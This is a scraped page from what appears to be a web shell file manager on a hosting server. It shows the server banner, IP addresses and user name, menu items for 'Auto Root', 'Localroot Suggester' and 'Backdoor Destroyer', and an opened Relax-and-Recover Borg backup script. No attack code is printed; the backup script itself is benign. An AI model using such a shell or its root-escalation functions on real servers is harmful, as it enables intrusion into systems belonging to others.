Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.217.87
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
backup /
BORG /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
100_get_suffix.sh
644
B
-rw-r--r--
2026-04-01 09:39
400_create_include_exclude_files.sh
6.16
KB
-rw-r--r--
2026-04-01 09:39
500_make_backup.sh
4.87
KB
-rw-r--r--
2026-04-01 09:39
800_prune_old_backups.sh
2.75
KB
-rw-r--r--
2026-04-01 09:39
900_umount_usb.sh
425
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# This file is part of Relax-and-Recover, licensed under the GNU General # Public License. Refer to the included COPYING for full text of license. # # 100_get_suffix.sh # Do we have Borg binary? has_binary borg StopIfError "Could not find Borg binary" # Let's find largest suffix in use, and increment it by 1. BORGBACKUP_SUFFIX=0 while IFS= read -r suffix_tmp; do if [ "$suffix_tmp" -gt "$BORGBACKUP_SUFFIX" ]; then BORGBACKUP_SUFFIX=$suffix_tmp fi done < <( grep "^${BORGBACKUP_ARCHIVE_PREFIX}_" "$BORGBACKUP_ARCHIVE_CACHE" \ | awk '{print $1}' \ | cut -d "_" -f 2 ) BORGBACKUP_SUFFIX=$(( BORGBACKUP_SUFFIX + 1 ))